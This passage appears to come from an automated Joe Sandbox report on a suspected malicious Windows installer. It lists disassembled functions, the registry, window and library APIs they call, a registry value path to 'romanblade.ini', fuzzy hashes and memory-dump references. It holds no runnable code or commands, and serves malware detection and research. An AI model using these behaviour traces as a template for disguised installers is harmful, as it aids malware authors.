                                                        • Instruction ID: 3f2e9d39a30109d4dd297e12bf5cacaacaa6ae2deeb589865bf4cc510dd46cad
                                                        • Opcode Fuzzy Hash: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
                                                        • Instruction Fuzzy Hash: 1A315E7190021AAADF20DF94DA88EBEB7B9EB14344F50443BE401F62D4D7B98A818B59
                                                        Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                        • lstrlenW.KERNEL32(C:\Program Files (x86)\edelweissen\romanblade.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateValuelstrlen
                                                        • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini
                                                        • API String ID: 1356686001-3814320704
                                                        • Opcode ID: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                        • Instruction ID: ae8cd99e4777b9a91f11086a6aa50b0fceabbd5df02328ddbc6dea80253d30cd
                                                        • Opcode Fuzzy Hash: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                        • Instruction Fuzzy Hash: 73119371A00109BFEB10EFA1DE49EAF7A7CEB40358F11403AF505B61D0DBB85D409B68
                                                        Function 00402B10 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B31
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B76
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B9B
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Close$DeleteEnumOpen
                                                        • String ID:
                                                        • API String ID: 1912718029-0
                                                        • Opcode ID: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                        • Instruction ID: 30c1bee4f6ef5540a549b97fb3682634b1066eef3f365ecf60e24fe04a280a9b
                                                        • Opcode Fuzzy Hash: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                        • Instruction Fuzzy Hash: F6113A71500108BFDF109F90DE89DAE3B79EB44348F10447AFA15B11A0D7B9AE55AA18
                                                        Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                        • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                        • DeleteObject.GDI32(00000000), ref: 00401D36
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                        • Instruction ID: 44b403d8ea142f61c46f59bdf5c6715f811f2d25bbd76591197da0c88fd97a40
                                                        • Opcode Fuzzy Hash: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                        • Instruction Fuzzy Hash: 97F0E1B2600505BFD701DBA4EF88DDE7BBCEB08351F101465F642F1190CA749D418B38
                                                        Function 004047DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 0040486F
                                                        • wsprintfW.USER32 ref: 00404878
                                                        • SetDlgItemTextW.USER32(?,0042D1F8), ref: 0040488B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s
                                                        • API String ID: 3540041739-3551169577
                                                        • Opcode ID: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                        • Instruction ID: 9325b392590c5ef976e2008094ad60f82e4542d9ead9839402a3ec0ae1c12cd4
                                                        • Opcode Fuzzy Hash: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                        • Instruction Fuzzy Hash: F01126336002243BDB10666D9C4AEEF3699DFC2335F144637FA25F60D0D979881186E8
                                                        Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                        • Instruction ID: cdd208a87cf377e151b028b5bc2daf4d5ae5f0581749dcda0b9a9113f5b0b00f
                                                        • Opcode Fuzzy Hash: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                        • Instruction Fuzzy Hash: 35216271A44109AFDF01AFB0DA4AAAE7A75EF44744F14403EF502B61D1DAB88590DB58
                                                        Function 00401F98 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                          • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,759223A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                          • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,759223A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                          • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,759223A0), ref: 00405055
                                                          • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                          • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                          • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                          • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                        • String ID: OC
                                                        • API String ID: 334405425-1597561874
                                                        • Opcode ID: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                        • Instruction ID: a758f152f971d74a5f32e3130d7e663150c352659b46f9ca4e023949e3a286cd
                                                        • Opcode Fuzzy Hash: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                        • Instruction Fuzzy Hash: 0A21A771900216EBCF20AFA5CE49A9E7EB0AF09354F20413BF615B51E0D7BD8982DB5D
                                                        Function 004057AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 004057B4
                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 004057BE
                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 004057D0
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-823278215
                                                        • Opcode ID: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                        • Instruction ID: d5080c12e7ff52c275ddc2bb7fa08cb5908483c46ce1eaa0ff7902437740b8fb
                                                        • Opcode Fuzzy Hash: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                        • Instruction Fuzzy Hash: 6ED05E31101E20AAC1116B549C08EDF66ACEE45300740802BF141B30A1D7781D418AFD
                                                        Function 00402C9B Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,00402E7B,00000001,?,?,?,00000000,004033FE,?), ref: 00402CAE
                                                        • GetTickCount.KERNEL32 ref: 00402CCC
                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402CE9
                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004033FE,?), ref: 00402CF7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                        • Instruction ID: 286efe5820fb8a572a90530028cebd71549732c65272ed0b190b82beaa7bbda7
                                                        • Opcode Fuzzy Hash: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                        • Instruction Fuzzy Hash: 6CF05E70606620BFD7216B24FF4D98F7A64F744B11B91043AF141B11E4C7B448C18BDC
                                                        Function 00404F6E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00404F9D
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00404FEE
                                                          • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                        • Instruction ID: 5368250be3cb6e4106e80ca770201d47c576881e659a98db37bb9bc21f5752cc
                                                        • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                        • Instruction Fuzzy Hash: 1A0184B150020AAFDF219F11DD81EAB3766EBC5755F104037FB00761D1CB7A8D62D669
                                                        Function 00403685 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,0040365D,0040349F,?), ref: 0040369F
                                                        • GlobalFree.KERNEL32(?), ref: 004036A6
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403697
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
